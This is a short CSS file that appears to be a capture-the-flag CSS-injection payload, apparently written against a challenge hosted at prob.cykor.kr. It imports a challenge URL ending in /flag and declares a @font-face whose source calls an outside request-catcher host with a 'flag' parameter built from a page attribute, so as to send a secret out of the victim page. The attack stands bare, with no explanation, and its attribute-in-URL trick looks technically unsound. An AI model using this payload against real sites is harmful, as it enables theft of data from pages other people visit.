@import url("http://prob.cykor.kr:8082/flag");

@font-face {
    font-family: 'exfil';
    src: url('https://wjebwgb.request.dreamhack.games/?flag=' attr(data-flag));
}

body {
    font-family: 'exfil';
    content: var(--flag);
}
